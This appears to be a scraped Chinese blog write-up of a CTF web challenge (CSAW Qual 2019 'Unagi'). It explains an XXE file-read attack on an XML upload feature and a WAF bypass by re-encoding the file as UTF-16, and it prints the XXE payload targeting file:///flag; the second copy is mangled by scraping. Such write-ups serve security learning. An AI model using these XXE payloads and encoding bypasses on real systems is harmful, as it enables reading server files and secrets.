buuctf_练[CSAWQual 2019]Web_Unagi

[CSAWQual 2019]Web_Unagi

文章目录

      • [CSAWQual 2019]Web_Unagi
      • 掌握知识
      • 解题思路
      • 关键payload

掌握知识

XXE漏洞利用,xml文件转换编码绕过WAF(UTF-8 --> UTF-16),xml文件格式的书写

​ 再遇到上传xml文件被拦截,就尝试修改编码再上传,换成其他的编码可能就匹配不到了UTF-16

解题思路

  1. 打开题目链接,有四个关键的导航栏,内容分别为欢迎语,用户信息,上传文件,提示flag/flag

buuctf_练[CSAWQual 2019]Web_Unagi_第1张图片

  1. 其中上传文件界面有上传文件的例子,点开发现是xml文件,看来多半是上传xml文件,进行XXE读取flag的利用了

buuctf_练[CSAWQual 2019]Web_Unagi_第2张图片

buuctf_练[CSAWQual 2019]Web_Unagi_第3张图片

  1. 根据网页上给出的XML的代码,将所有标签都复制下来,添加XXE利用头,再修改一个标签的内容,改成&admin;为了输出命令执行的结果。这里需要添加标签,因为其他标签长度不够不能显示完整的flag值,改标签能在user界面看到。
xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY admin SYSTEM "file:///flag" >]>
<users>
    <user>
        <username>bob</username>
        <password>passwd2</password>
        <name> Bob</name>
        <email>bob@fakesite.com</email>  
        <group>CSAW2019</group>
        <intro>&admin;</intro>
    </user>
</users>

buuctf_练[CSAWQual 2019]Web_Unagi_第4张图片

  1. 最关键的知识点就是,直接上传会被WAF拦截,这里需要用到XML文件转换编码来进行绕过,将UTF-8转换成UTF-16,使用vscode打开,直接在右下角更改编码即可。这个知识点确实第一次知道,记下来,以防后面用到。ctf考的就是知识点的积累,记得的题会,没遇到的知识点就会卡住了。上传编码后的文件,界面会输出flag

image-20231013192659712

buuctf_练[CSAWQual 2019]Web_Unagi_第5张图片

关键payload


DOCTYPE users [
]>
<users>
    <user>
        <username>bobusername>
        <password>passwd2password>
        <name> Bobname>
        <email>[email protected]email>  
        <group>CSAW2019group>
        <intro>&admin;intro>
    user>
users>

你可能感兴趣的:(buuctf刷题,其他,网络安全,笔记,web安全,linux)